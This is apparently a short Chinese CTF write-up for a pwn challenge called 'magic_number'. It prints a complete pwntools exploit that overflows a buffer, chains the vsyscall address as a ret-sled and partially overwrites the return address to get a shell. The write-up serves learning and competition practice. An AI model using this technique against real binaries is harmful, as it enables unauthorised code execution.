本文编写于 138 天前,最后修改于 138 天前,其中某些信息可能已经过时。
前言
题目是安恒月赛的magic_number,当时是懵逼的,赛后偶然间看到其他师傅的wp,才想起了萝卜师傅的一篇文章
magic_number
题目:pwn.rar
利用三个特殊的地址滑到下面
#coding:utf-8
from pwn import *
sh = process('./pwn')
sh.sendafter('Input :\n','a'*0x38+p64(0xffffffffff600000)*4+'\xa8')
sh.interactive()